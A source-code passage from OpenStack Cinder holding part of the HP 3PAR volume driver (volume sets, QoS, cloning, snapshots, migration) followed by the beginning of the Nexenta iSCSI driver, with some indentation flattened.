        # Map the textual priority to the array's level value.
        qosRule['priority'] = self.qos_priority_level.get(priority.lower())

    try:
        self.client.createQoSRules(vvs_name, qosRule)
    except Exception:
        with excutils.save_and_reraise_exception():
            LOG.error(_("Error creating QOS rule %s") % qosRule)
def _add_volume_to_volume_set(self, volume, volume_name,
                              cpg, vvs_name, qos):
    """Add *volume_name* to a 3PAR volume set.

    With *vvs_name* given, the volume joins that pre-existing,
    admin-defined set.  Otherwise a new per-volume set (named from the
    volume id) is created in the CPG's domain, the QoS rule is applied
    to it, and the volume is added; on failure the new set is removed.

    :raises exception.InvalidInput: the named VV set does not exist
    :raises exception.CinderException: QoS/membership setup failed
    """
    if vvs_name is not None:
        # Admin has set a volume set name to add the volume to
        try:
            self.client.addVolumeToVolumeSet(vvs_name, volume_name)
        except hpexceptions.HTTPNotFound:
            msg = _('VV Set %s does not exist.') % vvs_name
            LOG.error(msg)
            raise exception.InvalidInput(reason=msg)
    else:
        vvs_name = self._get_3par_vvs_name(volume['id'])
        domain = self.get_domain(cpg)
        self.client.createVolumeSet(vvs_name, domain)
        try:
            self._set_qos_rule(qos, vvs_name)
            self.client.addVolumeToVolumeSet(vvs_name, volume_name)
        except Exception as ex:
            # Cleanup the volume set if unable to create the qos rule
            # or add the volume to the volume set
            self.client.deleteVolumeSet(vvs_name)
            raise exception.CinderException(ex)
def get_cpg(self, volume, allowSnap=False):
    """Return the CPG the volume lives in.

    :param allowSnap: fall back to the snapshot CPG when the user CPG
                      is not reported
    :returns: CPG name, or None when no usable CPG field is present
    """
    vol = self.client.getVolume(self._get_3par_vol_name(volume['id']))
    if 'userCPG' in vol:
        return vol['userCPG']
    if allowSnap:
        return vol['snapCPG']
    return None

def _get_3par_vol_comment(self, volume_name):
    """Return the 3PAR volume's 'comment' field, or None if unset."""
    return self.client.getVolume(volume_name).get('comment')
def get_persona_type(self, volume, hp3par_keys=None):
    """Resolve the 3PAR persona id for *volume*.

    Reads the 'persona' key from the type's hp3par extra specs (the
    first entry of valid_persona_values is the default) and returns
    only the numeric id portion, e.g. '1' for '1 - Generic'.

    :raises exception.InvalidInput: the persona value is not valid
    """
    default_persona = self.valid_persona_values[0]
    type_id = volume.get('volume_type_id', None)
    if type_id is not None:
        volume_type = self._get_volume_type(type_id)
        if hp3par_keys is None:
            hp3par_keys = self._get_keys_by_volume_type(volume_type)
    persona_value = self._get_key_value(hp3par_keys, 'persona',
                                        default_persona)
    if persona_value not in self.valid_persona_values:
        err = _("Must specify a valid persona %(valid)s, "
                "value '%(persona)s' is invalid.") % \
            ({'valid': self.valid_persona_values,
              'persona': persona_value})
        LOG.error(err)
        raise exception.InvalidInput(reason=err)
    # persona is set by the id so remove the text and return the id
    # i.e for persona '1 - Generic' returns 1
    return persona_value.split(' ')[0]
def get_volume_settings_from_type(self, volume):
    """Collect all creation settings implied by the volume's type.

    :returns: dict with keys 'cpg', 'snap_cpg', 'vvs_name', 'qos',
              'tpvv' (thin-provisioning flag) and 'volume_type'
    :raises exception.InvalidInput: invalid provisioning or persona
    """
    cpg = None
    snap_cpg = None
    volume_type = None
    vvs_name = None
    hp3par_keys = {}
    qos = {}
    type_id = volume.get('volume_type_id', None)
    if type_id is not None:
        volume_type = self._get_volume_type(type_id)
        hp3par_keys = self._get_keys_by_volume_type(volume_type)
        vvs_name = self._get_key_value(hp3par_keys, 'vvs')
        # QoS from the type is only used when no admin VV set is named.
        if vvs_name is None:
            qos = self._get_qos_by_volume_type(volume_type)

    cpg = self._get_key_value(hp3par_keys, 'cpg',
                              self.config.hp3par_cpg)
    # NOTE(review): identity comparison ("is not") looks deliberate:
    # _get_key_value returns the exact default object when the key is
    # missing, so this distinguishes "cpg came from an extra spec" from
    # "cpg is the config default" even when the strings are equal --
    # confirm before changing this to !=.
    if cpg is not self.config.hp3par_cpg:
        # The cpg was specified in a volume type extra spec so it
        # needs to be validated that it's in the correct domain.
        self.validate_cpg(cpg)
        # Also, look to see if the snap_cpg was specified in volume
        # type extra spec, if not use the extra spec cpg as the
        # default.
        snap_cpg = self._get_key_value(hp3par_keys, 'snap_cpg', cpg)
    else:
        # default snap_cpg to hp3par_cpg_snap if it's not specified
        # in the volume type extra specs.
        snap_cpg = self.config.hp3par_cpg_snap
        # if it's still not set or empty then set it to the cpg
        # specified in the cinder.conf file.
        if not self.config.hp3par_cpg_snap:
            snap_cpg = cpg

    # if provisioning is not set use thin
    default_prov = self.valid_prov_values[0]
    prov_value = self._get_key_value(hp3par_keys, 'provisioning',
                                     default_prov)
    # check for valid provisioning type
    if prov_value not in self.valid_prov_values:
        err = _("Must specify a valid provisioning type %(valid)s, "
                "value '%(prov)s' is invalid.") % \
            ({'valid': self.valid_prov_values,
              'prov': prov_value})
        LOG.error(err)
        raise exception.InvalidInput(reason=err)

    tpvv = True
    if prov_value == "full":
        tpvv = False

    # check for valid persona even if we don't use it until
    # attach time, this will give the end user notice that the
    # persona type is invalid at volume creation time
    self.get_persona_type(volume, hp3par_keys)

    return {'cpg': cpg, 'snap_cpg': snap_cpg,
            'vvs_name': vvs_name, 'qos': qos,
            'tpvv': tpvv, 'volume_type': volume_type}
def create_volume(self, volume):
    """Create a new 3PAR volume for a Cinder volume.

    Volume-type extra specs / qos specs drive the CPG, snap CPG,
    provisioning type and QoS / volume-set membership.  Cinder metadata
    is stored as JSON in the 3PAR volume 'comment' field.

    :raises exception.Duplicate: the volume already exists on the array
    :raises exception.Invalid, exception.InvalidInput,
            exception.CinderException: on backend errors
    """
    LOG.debug("CREATE VOLUME (%s : %s %s)" %
              (volume['display_name'], volume['name'],
               self._get_3par_vol_name(volume['id'])))
    try:
        comments = {'volume_id': volume['id'],
                    'name': volume['name'],
                    'type': 'OpenStack'}

        name = volume.get('display_name', None)
        if name:
            comments['display_name'] = name

        # get the options supported by volume types
        type_info = self.get_volume_settings_from_type(volume)
        volume_type = type_info['volume_type']
        vvs_name = type_info['vvs_name']
        qos = type_info['qos']
        cpg = type_info['cpg']
        snap_cpg = type_info['snap_cpg']
        tpvv = type_info['tpvv']

        type_id = volume.get('volume_type_id', None)
        if type_id is not None:
            comments['volume_type_name'] = volume_type.get('name')
            comments['volume_type_id'] = type_id
            if vvs_name is not None:
                comments['vvs'] = vvs_name
            else:
                comments['qos'] = qos

        extras = {'comment': json.dumps(comments),
                  'snapCPG': snap_cpg,
                  'tpvv': tpvv}

        capacity = self._capacity_from_size(volume['size'])
        volume_name = self._get_3par_vol_name(volume['id'])
        self.client.createVolume(volume_name, cpg, capacity, extras)
        if qos or vvs_name is not None:
            try:
                self._add_volume_to_volume_set(volume, volume_name,
                                               cpg, vvs_name, qos)
            except exception.InvalidInput as ex:
                # Delete the volume if unable to add it to the volume set
                self.client.deleteVolume(volume_name)
                LOG.error(ex)
                raise exception.CinderException(ex)
    except hpexceptions.HTTPConflict:
        msg = _("Volume (%s) already exists on array") % volume_name
        LOG.error(msg)
        raise exception.Duplicate(msg)
    except hpexceptions.HTTPBadRequest as ex:
        LOG.error(ex)
        raise exception.Invalid(ex.get_description())
    except exception.InvalidInput as ex:
        LOG.error(ex)
        raise ex
    except exception.CinderException as ex:
        LOG.error(ex)
        raise ex
    except Exception as ex:
        LOG.error(ex)
        raise exception.CinderException(ex)
def _copy_volume(self, src_name, dest_name, cpg, snap_cpg=None,
                 tpvv=True):
    """Start an online physical copy of *src_name* to *dest_name*.

    :returns: the 3PAR task id of the scheduled copy
    """
    # Virtual volume sets are not supported with the -online option
    LOG.debug('Creating clone of a volume %(src)s to %(dest)s.' %
              {'src': src_name, 'dest': dest_name})
    opts = {'tpvv': tpvv, 'online': True}
    if snap_cpg is not None:
        opts['snapCPG'] = snap_cpg
    result = self.client.copyVolume(src_name, dest_name, cpg, opts)
    return result['taskid']
def get_next_word(self, s, search_string):
    """Return the word that follows *search_string* in *s*.

    Search *s* for *search_string*; if found, return the word
    immediately following it.  (The previous docstring incorrectly
    said the *preceding* word was returned.)

    :raises AttributeError: when search_string is not found in s
    """
    word = re.search(search_string.strip(' ') + ' ([^ ]*)', s)
    return word.groups()[0].strip(' ')
def _get_3par_vol_comment_value(self, vol_comment, key):
    """Parse the volume comment (a Python-literal dict string) and
    return the value stored under *key*, or None when absent."""
    return dict(ast.literal_eval(vol_comment)).get(key)
def create_cloned_volume(self, volume, src_vref):
    """Clone an existing volume via a 3PAR online physical copy.

    :returns: None (no model update); the copy runs asynchronously
              on the array
    """
    try:
        orig_name = self._get_3par_vol_name(volume['source_volid'])
        vol_name = self._get_3par_vol_name(volume['id'])

        type_info = self.get_volume_settings_from_type(volume)

        # make the 3PAR copy the contents.
        # can't delete the original until the copy is done.
        self._copy_volume(orig_name, vol_name, cpg=type_info['cpg'],
                          snap_cpg=type_info['snap_cpg'],
                          tpvv=type_info['tpvv'])
        return None
    except hpexceptions.HTTPForbidden:
        raise exception.NotAuthorized()
    except hpexceptions.HTTPNotFound:
        raise exception.NotFound()
    except Exception as ex:
        LOG.error(ex)
        raise exception.CinderException(ex)
def delete_volume(self, volume):
    """Delete a volume from the 3PAR array.

    Special cases handled:
      * the volume is still being cloned online -> stop the copy
        (which also deletes it);
      * the volume belongs to a volume set -> remove it from (or
        delete) the set first, then retry the delete;
      * the volume is already gone -> treated as success so stale
        cinder entries can be cleaned up.
    """
    try:
        volume_name = self._get_3par_vol_name(volume['id'])
        # Try and delete the volume, it might fail here because
        # the volume is part of a volume set which will have the
        # volume set name in the error.
        try:
            self.client.deleteVolume(volume_name)
        except hpexceptions.HTTPBadRequest as ex:
            if ex.get_code() == 29:
                if self.client.isOnlinePhysicalCopy(volume_name):
                    LOG.debug("Found an online copy for %(volume)s"
                              % {'volume': volume_name})
                    # the volume is in process of being cloned.
                    # stopOnlinePhysicalCopy will also delete
                    # the volume once it stops the copy.
                    self.client.stopOnlinePhysicalCopy(volume_name)
                else:
                    LOG.error(ex)
                    raise ex
            else:
                LOG.error(ex)
                raise ex
        except hpexceptions.HTTPConflict as ex:
            if ex.get_code() == 34:
                # This is a special case which means the
                # volume is part of a volume set.
                vvset_name = self.client.findVolumeSet(volume_name)
                LOG.debug("Returned vvset_name = %s" % vvset_name)
                if vvset_name is not None and \
                        vvset_name.startswith('vvs-'):
                    # We have a single volume per volume set, so
                    # remove the volume set.
                    self.client.deleteVolumeSet(
                        self._get_3par_vvs_name(volume['id']))
                elif vvset_name is not None:
                    # We have a pre-defined volume set just remove the
                    # volume and leave the volume set.
                    self.client.removeVolumeFromVolumeSet(vvset_name,
                                                          volume_name)
                self.client.deleteVolume(volume_name)
            else:
                LOG.error(ex)
                raise ex
    except hpexceptions.HTTPNotFound as ex:
        # We'll let this act as if it worked
        # it helps clean up the cinder entries.
        msg = _("Delete volume id not found. Removing from cinder: "
                "%(id)s Ex: %(msg)s") % {'id': volume['id'], 'msg': ex}
        LOG.warning(msg)
    except hpexceptions.HTTPForbidden as ex:
        LOG.error(ex)
        raise exception.NotAuthorized(ex.get_description())
    except hpexceptions.HTTPConflict as ex:
        LOG.error(ex)
        raise exception.VolumeIsBusy(ex.get_description())
    except Exception as ex:
        LOG.error(ex)
        raise exception.CinderException(ex)
def create_volume_from_snapshot(self, volume, snapshot):
    """Creates a volume from a snapshot.

    The new volume is created as a writable snapshot of the source
    snapshot.  When the requested size is larger than the snapshot's
    volume, the copy is first converted to a base volume and grown.

    :raises exception.InvalidInput: requested size is smaller than the
                                    snapshot's volume
    """
    LOG.debug("Create Volume from Snapshot\n%s\n%s" %
              (pprint.pformat(volume['display_name']),
               pprint.pformat(snapshot['display_name'])))

    if volume['size'] < snapshot['volume_size']:
        err = ("You cannot reduce size of the volume. It must "
               "be greater than or equal to the snapshot.")
        LOG.error(err)
        raise exception.InvalidInput(reason=err)

    try:
        snap_name = self._get_3par_snap_name(snapshot['id'])
        volume_name = self._get_3par_vol_name(volume['id'])

        # Cinder metadata stored as JSON in the 3PAR comment field.
        extra = {'volume_id': volume['id'],
                 'snapshot_id': snapshot['id']}

        volume_type = None
        type_id = volume.get('volume_type_id', None)
        vvs_name = None
        qos = {}
        hp3par_keys = {}
        if type_id is not None:
            volume_type = self._get_volume_type(type_id)
            hp3par_keys = self._get_keys_by_volume_type(volume_type)
            vvs_name = self._get_key_value(hp3par_keys, 'vvs')
            if vvs_name is None:
                qos = self._get_qos_by_volume_type(volume_type)

        name = volume.get('display_name', None)
        if name:
            extra['display_name'] = name

        description = volume.get('display_description', None)
        if description:
            extra['description'] = description

        optional = {'comment': json.dumps(extra),
                    'readOnly': False}

        self.client.createSnapshot(volume_name, snap_name, optional)

        # Grow the snapshot if needed
        growth_size = volume['size'] - snapshot['volume_size']
        if growth_size > 0:
            try:
                LOG.debug('Converting to base volume type: %s.' %
                          volume['id'])
                self._convert_to_base_volume(volume)
                growth_size_mib = growth_size * units.Gi / units.Mi
                LOG.debug('Growing volume: %(id)s by %(size)s GiB.' %
                          {'id': volume['id'], 'size': growth_size})
                self.client.growVolume(volume_name, growth_size_mib)
            except Exception as ex:
                LOG.error(_("Error extending volume %(id)s. Ex: %(ex)s") %
                          {'id': volume['id'], 'ex': ex})
                # Delete the volume if unable to grow it
                self.client.deleteVolume(volume_name)
                raise exception.CinderException(ex)

        if qos or vvs_name is not None:
            cpg = self._get_key_value(hp3par_keys, 'cpg',
                                      self.config.hp3par_cpg)
            try:
                self._add_volume_to_volume_set(volume, volume_name,
                                               cpg, vvs_name, qos)
            except Exception as ex:
                # Delete the volume if unable to add it to the volume set
                self.client.deleteVolume(volume_name)
                LOG.error(ex)
                raise exception.CinderException(ex)
    except hpexceptions.HTTPForbidden as ex:
        LOG.error(ex)
        raise exception.NotAuthorized()
    except hpexceptions.HTTPNotFound as ex:
        LOG.error(ex)
        raise exception.NotFound()
    except Exception as ex:
        LOG.error(ex)
        raise exception.CinderException(ex)
def create_snapshot(self, snapshot):
    """Create a read-only snapshot of an existing 3PAR volume.

    Expiration and retention hours are applied when configured.
    Cinder metadata is stored as JSON in the snapshot comment field.
    """
    LOG.debug("Create Snapshot\n%s" % pprint.pformat(snapshot))

    try:
        snap_name = self._get_3par_snap_name(snapshot['id'])
        vol_name = self._get_3par_vol_name(snapshot['volume_id'])

        extra = {'volume_name': snapshot['volume_name']}
        vol_id = snapshot.get('volume_id', None)
        if vol_id:
            extra['volume_id'] = vol_id

        try:
            extra['display_name'] = snapshot['display_name']
        except AttributeError:
            pass

        try:
            extra['description'] = snapshot['display_description']
        except AttributeError:
            pass

        optional = {'comment': json.dumps(extra),
                    'readOnly': True}
        if self.config.hp3par_snapshot_expiration:
            optional['expirationHours'] = (
                self.config.hp3par_snapshot_expiration)

        if self.config.hp3par_snapshot_retention:
            optional['retentionHours'] = (
                self.config.hp3par_snapshot_retention)

        self.client.createSnapshot(snap_name, vol_name, optional)
    except hpexceptions.HTTPForbidden as ex:
        LOG.error(ex)
        raise exception.NotAuthorized()
    except hpexceptions.HTTPNotFound as ex:
        LOG.error(ex)
        raise exception.NotFound()
def update_volume_key_value_pair(self, volume, key, value):
    """Store a (key, value) metadata pair on the backing 3PAR volume.

    An existing value for *key* is overwritten; None is stored as ''.
    """
    LOG.debug("VOLUME (%s : %s %s) Updating KEY-VALUE pair: (%s : %s)" %
              (volume['display_name'],
               volume['name'],
               self._get_3par_vol_name(volume['id']),
               key,
               value))
    try:
        vol_name = self._get_3par_vol_name(volume['id'])
        self.client.setVolumeMetaData(
            vol_name, key, '' if value is None else value)
    except Exception as ex:
        msg = _('Failure in update_volume_key_value_pair:%s') % ex
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

def clear_volume_key_value_pair(self, volume, key):
    """Remove the metadata entry *key* from the backing 3PAR volume."""
    LOG.debug("VOLUME (%s : %s %s) Clearing Key : %s)" %
              (volume['display_name'], volume['name'],
               self._get_3par_vol_name(volume['id']), key))
    try:
        vol_name = self._get_3par_vol_name(volume['id'])
        self.client.removeVolumeMetaData(vol_name, key)
    except Exception as ex:
        msg = _('Failure in clear_volume_key_value_pair:%s') % ex
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)

def attach_volume(self, volume, instance_uuid):
    """Record the attaching instance's uuid as 3PAR volume metadata."""
    LOG.debug("Attach Volume\n%s" % pprint.pformat(volume))
    try:
        self.update_volume_key_value_pair(volume,
                                          'HPQ-CS-instance_uuid',
                                          instance_uuid)
    except Exception:
        with excutils.save_and_reraise_exception():
            LOG.error(_("Error attaching volume %s") % volume)

def detach_volume(self, volume):
    """Drop the instance-uuid metadata recorded by attach_volume."""
    LOG.debug("Detach Volume\n%s" % pprint.pformat(volume))
    try:
        self.clear_volume_key_value_pair(volume, 'HPQ-CS-instance_uuid')
    except Exception:
        with excutils.save_and_reraise_exception():
            LOG.error(_("Error detaching volume %s") % volume)
def migrate_volume(self, volume, host):
    """Migrate directly if source and dest are managed by same storage.

    Only migrations between CPGs of the *same* 3PAR array (matching
    serial number) and the same domain are handled; everything else
    returns (False, None) so the generic migration path takes over.

    :param volume: A dictionary describing the volume to migrate
    :param host: A dictionary describing the host to migrate to, where
                 host['host'] is its name, and host['capabilities'] is a
                 dictionary of its reported capabilities.
    :returns (False, None) if the driver does not support migration,
             (True, None) if successful
    """
    dbg = {'id': volume['id'], 'host': host['host']}
    LOG.debug('enter: migrate_volume: id=%(id)s, host=%(host)s.' % dbg)

    false_ret = (False, None)

    # Make sure volume is not attached
    if volume['status'] != 'available':
        LOG.debug('Volume is attached: migrate_volume: '
                  'id=%(id)s, host=%(host)s.' % dbg)
        return false_ret

    if 'location_info' not in host['capabilities']:
        return false_ret

    info = host['capabilities']['location_info']
    try:
        # location_info is '<driver name>:<serial number>:<cpg>'.
        (dest_type, dest_id, dest_cpg) = info.split(':')
    except ValueError:
        return false_ret

    sys_info = self.client.getStorageSystemInfo()
    if not (dest_type == 'HP3PARDriver' and
            dest_id == sys_info['serialNumber']):
        LOG.debug('Dest does not match: migrate_volume: '
                  'id=%(id)s, host=%(host)s.' % dbg)
        return false_ret

    type_info = self.get_volume_settings_from_type(volume)

    if dest_cpg == type_info['cpg']:
        LOG.debug('CPGs are the same: migrate_volume: '
                  'id=%(id)s, host=%(host)s.' % dbg)
        return false_ret

    # Check to make sure CPGs are in the same domain
    src_domain = self.get_domain(type_info['cpg'])
    dst_domain = self.get_domain(dest_cpg)
    if src_domain != dst_domain:
        LOG.debug('CPGs in different domains: migrate_volume: '
                  'id=%(id)s, host=%(host)s.' % dbg)
        return false_ret

    self._convert_to_base_volume(volume, new_cpg=dest_cpg)

    # TODO(Ramy) When volume retype is available,
    # use that to change the type
    LOG.debug('leave: migrate_volume: id=%(id)s, host=%(host)s.' % dbg)
    return (True, None)
def _convert_to_base_volume(self, volume, new_cpg=None):
    """Convert a snapshot-backed/cloned volume into a base volume.

    An online physical copy is made under a temporary name; once the
    copy task finishes the source is deleted and the copy is renamed
    back to the original name.

    :param new_cpg: target CPG for the copy (defaults to the type's)
    :raises exception.Duplicate, exception.Invalid,
            exception.CinderException: on backend errors
    """
    try:
        type_info = self.get_volume_settings_from_type(volume)
        if new_cpg:
            cpg = new_cpg
        else:
            cpg = type_info['cpg']

        # Change the name such that it is unique since 3PAR
        # names must be unique across all CPGs
        volume_name = self._get_3par_vol_name(volume['id'])
        temp_vol_name = volume_name.replace("osv-", "omv-")

        # Create a physical copy of the volume
        task_id = self._copy_volume(volume_name, temp_vol_name,
                                    cpg, cpg, type_info['tpvv'])

        LOG.debug('Copy volume scheduled: convert_to_base_volume: '
                  'id=%s.' % volume['id'])

        # Wait for the physical copy task to complete
        def _wait_for_task(task_id):
            status = self.client.getTask(task_id)
            LOG.debug("3PAR Task id %(id)s status = %(status)s" %
                      {'id': task_id,
                       'status': status['status']})
            # Use != rather than "is not": the statuses are plain ints
            # and identity comparison only worked by CPython's
            # small-int caching accident.
            if status['status'] != self.client.TASK_ACTIVE:
                self._task_status = status
                raise loopingcall.LoopingCallDone()

        self._task_status = None
        timer = loopingcall.FixedIntervalLoopingCall(
            _wait_for_task, task_id)
        timer.start(interval=1).wait()

        # Same int-comparison fix as above.
        if self._task_status['status'] != self.client.TASK_DONE:
            dbg = {'status': self._task_status, 'id': volume['id']}
            msg = _('Copy volume task failed: convert_to_base_volume: '
                    'id=%(id)s, status=%(status)s.') % dbg
            raise exception.CinderException(msg)
        else:
            LOG.debug('Copy volume completed: convert_to_base_volume: '
                      'id=%s.' % volume['id'])

        comment = self._get_3par_vol_comment(volume_name)
        if comment:
            self.client.modifyVolume(temp_vol_name, {'comment': comment})
        LOG.debug('Volume rename completed: convert_to_base_volume: '
                  'id=%s.' % volume['id'])

        # Delete source volume after the copy is complete
        self.client.deleteVolume(volume_name)
        LOG.debug('Delete src volume completed: convert_to_base_volume: '
                  'id=%s.' % volume['id'])

        # Rename the new volume to the original name
        self.client.modifyVolume(temp_vol_name, {'newName': volume_name})

        LOG.info(_('Completed: convert_to_base_volume: '
                   'id=%s.') % volume['id'])
    except hpexceptions.HTTPConflict:
        msg = _("Volume (%s) already exists on array.") % volume_name
        LOG.error(msg)
        raise exception.Duplicate(msg)
    except hpexceptions.HTTPBadRequest as ex:
        LOG.error(ex)
        raise exception.Invalid(ex.get_description())
    except exception.InvalidInput as ex:
        LOG.error(ex)
        raise ex
    except exception.CinderException as ex:
        LOG.error(ex)
        raise ex
    except Exception as ex:
        LOG.error(ex)
        raise exception.CinderException(ex)
def delete_snapshot(self, snapshot):
    """Delete a snapshot from the 3PAR array.

    A missing snapshot is logged and treated as success; a conflict
    (snapshot in use) raises SnapshotIsBusy.
    """
    LOG.debug("Delete Snapshot id %s %s" % (snapshot['id'],
                                            pprint.pformat(snapshot)))

    try:
        snap_name = self._get_3par_snap_name(snapshot['id'])
        self.client.deleteVolume(snap_name)
    except hpexceptions.HTTPForbidden as ex:
        LOG.error(ex)
        raise exception.NotAuthorized()
    except hpexceptions.HTTPNotFound as ex:
        # We'll let this act as if it worked
        # it helps clean up the cinder entries.
        msg = _("Delete Snapshot id not found. Removing from cinder: "
                "%(id)s Ex: %(msg)s") % {'id': snapshot['id'], 'msg': ex}
        LOG.warning(msg)
    except hpexceptions.HTTPConflict as ex:
        LOG.error(ex)
        raise exception.SnapshotIsBusy(snapshot_name=snapshot['id'])
def _get_3par_hostname_from_wwn_iqn(self, wwns, iqns):
    """Find the 3PAR host whose FC WWN or iSCSI IQN matches.

    Either argument may be a single value or a list.  Returns the
    first matching host name, or None when nothing matches.
    """
    if wwns is not None and not isinstance(wwns, list):
        wwns = [wwns]
    if iqns is not None and not isinstance(iqns, list):
        iqns = [iqns]

    for host in self.client.getHosts()['members']:
        # iSCSI paths are checked before FC paths, as before.
        if iqns is not None and 'iSCSIPaths' in host:
            for path in host['iSCSIPaths']:
                if path['name'] in iqns:
                    return host['name']
        if wwns is not None and 'FCPaths' in host:
            for path in host['FCPaths']:
                if path['wwn'] in wwns:
                    return host['name']
def terminate_connection(self, volume, hostname, wwn=None, iqn=None):
    """Driver entry point to unattach a volume from an instance.

    If the host is unknown under the cinder-provided name, retries
    after resolving the 3PAR host name from the given WWN/IQN.
    """
    try:
        # does 3par know this host by a different name?
        if hostname in self.hosts_naming_dict:
            hostname = self.hosts_naming_dict.get(hostname)
        self.delete_vlun(volume, hostname)
        return
    except hpexceptions.HTTPNotFound as e:
        if 'host does not exist' in e.get_description():
            # use the wwn to see if we can find the hostname
            hostname = self._get_3par_hostname_from_wwn_iqn(wwn, iqn)
            # no 3par host, re-throw
            if (hostname is None):
                LOG.error(e)
                raise
        else:
            # not a 'host does not exist' HTTPNotFound exception, re-throw
            LOG.error(e)
            raise

    # try again with name retrieved from 3par
    self.delete_vlun(volume, hostname)
def build_nsp(self, portPos):
    """Format a port-position dict as an 'node:slot:port' string."""
    return '{node}:{slot}:{cardPort}'.format(**portPos)

def build_portPos(self, nsp):
    """Parse an 'node:slot:port' string into a dict of ints."""
    node, slot, card_port = nsp.split(":")
    return {'node': int(node),
            'slot': int(slot),
            'cardPort': int(card_port)}
|
adelina-t/cinder | cinder/volume/drivers/nexenta/iscsi.py | # Copyright 2011 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`nexenta.iscsi` -- Driver to store volumes on Nexenta Appliance
=====================================================================
.. automodule:: nexenta.volume
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.volume import driver
from cinder.volume.drivers import nexenta
from cinder.volume.drivers.nexenta import jsonrpc
from cinder.volume.drivers.nexenta import options
from cinder.volume.drivers.nexenta import utils
VERSION = '1.2.1'
LOG = logging.getLogger(__name__)
class NexentaISCSIDriver(driver.ISCSIDriver): # pylint: disable=R0921
"""Executes volume driver commands on Nexenta Appliance.
Version history:
1.0.0 - Initial driver version.
1.0.1 - Fixed bug #1236626: catch "does not exist" exception of
lu_exists.
1.1.0 - Changed class name to NexentaISCSIDriver.
1.1.1 - Ignore "does not exist" exception of nms.snapshot.destroy.
1.1.2 - Optimized create_cloned_volume, replaced zfs send recv with zfs
clone.
1.1.3 - Extended volume stats provided by _update_volume_stats method.
1.2.0 - Added volume migration with storage assist method.
1.2.1 - Fixed bug #1263258: now migrate_volume update provider_location
of migrated volume; after migrating volume migrate_volume
destroy snapshot on migration destination.
"""
VERSION = VERSION
def __init__(self, *args, **kwargs):
    """Register Nexenta option groups and cache connection settings.

    The NMS JSON-RPC proxy itself is created later in do_setup().
    """
    super(NexentaISCSIDriver, self).__init__(*args, **kwargs)
    self.nms = None  # JSON-RPC proxy; assigned in do_setup()
    if self.configuration:
        self.configuration.append_config_values(
            options.NEXENTA_CONNECTION_OPTIONS)
        self.configuration.append_config_values(
            options.NEXENTA_ISCSI_OPTIONS)
        self.configuration.append_config_values(
            options.NEXENTA_VOLUME_OPTIONS)
        self.configuration.append_config_values(
            options.NEXENTA_RRMGR_OPTIONS)
    self.nms_protocol = self.configuration.nexenta_rest_protocol
    self.nms_host = self.configuration.nexenta_host
    self.nms_port = self.configuration.nexenta_rest_port
    self.nms_user = self.configuration.nexenta_user
    self.nms_password = self.configuration.nexenta_password
    self.volume = self.configuration.nexenta_volume
    self.rrmgr_compression = self.configuration.nexenta_rrmgr_compression
    self.rrmgr_tcp_buf_size = self.configuration.nexenta_rrmgr_tcp_buf_size
    self.rrmgr_connections = self.configuration.nexenta_rrmgr_connections
    self.iscsi_target_portal_port = \
        self.configuration.nexenta_iscsi_target_portal_port
@property
def backend_name(self):
    """The configured backend name, falling back to the class name."""
    name = None
    if self.configuration:
        name = self.configuration.safe_get('volume_backend_name')
    return name or self.__class__.__name__
def do_setup(self, context):
    """Create the NMS JSON-RPC proxy used for all appliance calls."""
    auto = self.nms_protocol == 'auto'
    protocol = 'http' if auto else self.nms_protocol
    self.nms = jsonrpc.NexentaJSONProxy(
        protocol, self.nms_host, self.nms_port, '/rest/nms', self.nms_user,
        self.nms_password, auto=auto)
def check_for_setup_error(self):
    """Verify that the volume for our zvols exists.

    :raise: :py:exc:`LookupError`
    """
    if not self.nms.volume.object_exists(self.volume):
        # Interpolate with %; previously the volume name was passed as
        # a second exception argument and the %s placeholder was never
        # filled in.
        raise LookupError(_("Volume %s does not exist in Nexenta SA")
                          % self.volume)
def _get_zvol_name(self, volume_name):
    """Return zvol name that corresponds given volume name."""
    return '/'.join((self.volume, volume_name))

def _get_target_name(self, volume_name):
    """Return iSCSI target name to access volume."""
    return self.configuration.nexenta_target_prefix + volume_name

def _get_target_group_name(self, volume_name):
    """Return Nexenta iSCSI target group name for volume."""
    return self.configuration.nexenta_target_group_prefix + volume_name

@staticmethod
def _get_clone_snapshot_name(volume):
    """Return name for snapshot that will be used to clone the volume."""
    return 'cinder-clone-snapshot-{0}'.format(volume['id'])

@staticmethod
def _is_clone_snapshot_name(snapshot):
    """Check if snapshot is created for cloning."""
    return snapshot.split('@')[-1].startswith('cinder-clone-snapshot-')
def create_volume(self, volume):
    """Create a zvol on appliance.

    :param volume: volume reference
    :return: model update dict for volume reference
    """
    zvol_name = self._get_zvol_name(volume['name'])
    size = '%sG' % (volume['size'],)
    self.nms.zvol.create(
        zvol_name,
        size,
        self.configuration.nexenta_blocksize,
        self.configuration.nexenta_sparse)
    return self.create_export(None, volume)
def extend_volume(self, volume, new_size):
    """Extend an existing volume.

    :param volume: volume reference
    :param new_size: volume new size in GB
    """
    LOG.info(_('Extending volume: %(id)s New size: %(size)s GB'),
             {'id': volume['id'], 'size': new_size})
    zvol_name = self._get_zvol_name(volume['name'])
    self.nms.zvol.set_child_prop(zvol_name, 'volsize', '%sG' % new_size)
def delete_volume(self, volume):
    """Destroy a zvol on appliance.

    If the zvol was cloned from a temporary clone snapshot, that
    origin snapshot is deleted afterwards as well.

    :param volume: volume reference
    """
    volume_name = self._get_zvol_name(volume['name'])
    # Read 'origin' before destroying so a clone snapshot can be
    # cleaned up afterwards.
    props = self.nms.zvol.get_child_props(volume_name, 'origin') or {}
    try:
        self.nms.zvol.destroy(volume_name, '')
    except nexenta.NexentaException as exc:
        if 'does not exist' in exc.args[0]:
            LOG.info(_('Volume %s does not exist, it seems it was already '
                       'deleted.'), volume_name)
            return
        if 'zvol has children' in exc.args[0]:
            raise exception.VolumeIsBusy(volume_name=volume_name)
        raise
    origin = props.get('origin')
